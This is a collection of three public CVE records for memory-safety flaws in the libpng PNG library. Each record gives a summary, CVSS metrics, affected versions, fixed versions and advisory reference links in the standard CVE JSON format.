LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.
Severity ?
6.1 (Medium)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-22695",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-13T14:13:00.487878Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T19:07:10.972Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-12T22:55:40.204Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp"
},
{
"name": "https://github.com/pnggroup/libpng/issues/778",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/778"
},
{
"name": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea"
},
{
"name": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2"
}
],
"source": {
"advisory": "GHSA-mmq5-27w3-rxpp",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has a heap buffer over-read in png_image_read_direct_scaled (regression from CVE-2025-65018 fix)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-22695",
"datePublished": "2026-01-12T22:55:40.204Z",
"dateReserved": "2026-01-08T19:23:09.855Z",
"dateUpdated": "2026-01-13T19:07:10.972Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-66293 (GCVE-0-2025-66293)
Vulnerability from cvelistv5 – Published: 2025-12-03 20:33 – Updated: 2025-12-04 01:31
VLAI?
Title
LIBPNG has an out-of-bounds read in png_image_read_composite
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later.
Severity ?
7.1 (High)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-66293",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-03T20:52:13.771582Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T20:55:03.573Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/issues/764"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-12-04T01:31:47.574Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/03/8"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.52"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng\u0027s simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng\u0027s internal state management. Upgrade to libpng 1.6.52 or later."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T20:33:57.086Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f"
},
{
"name": "https://github.com/pnggroup/libpng/issues/764",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/764"
},
{
"name": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1"
},
{
"name": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a"
}
],
"source": {
"advisory": "GHSA-9mpm-9pxh-mg4f",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has an out-of-bounds read in png_image_read_composite"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-66293",
"datePublished": "2025-12-03T20:33:57.086Z",
"dateReserved": "2025-11-26T23:11:46.392Z",
"dateUpdated": "2025-12-04T01:31:47.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-65018 (GCVE-0-2025-65018)
Vulnerability from cvelistv5 – Published: 2025-11-24 23:50 – Updated: 2025-11-25 19:29
VLAI?
Title
LIBPNG is vulnerable to a heap buffer overflow in `png_combine_row` triggered via `png_image_finish_read`
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51.
Severity ?
7.1 (High)
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-65018",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-25T19:29:28.950712Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-25T19:29:33.633Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/issues/755"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.0, \u003c 1.6.51"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-24T23:50:18.294Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g"
},
{
"name": "https://github.com/pnggroup/libpng/issues/755",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/issues/755"
},
{
"name": "https://github.com/pnggroup/libpng/pull/757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/757"
},
{
"name": "https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d"
},
{
"name": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea"
}
],
"source": {
"advisory": "GHSA-7wv6-48j4-hj3g",
"discovery": "UNKNOWN"
},
"title": "LIBPNG is vulnerable to a heap buffer overflow in `png_combine_row` triggered via `png_image_finish_read`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-65018",
"datePublished": "2025-11-24T23:50:18.294Z",
"dateReserved": "2025-11-13T15:36:51.680Z",
"dateUpdated": "2025-11-25T19:29:33.633Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}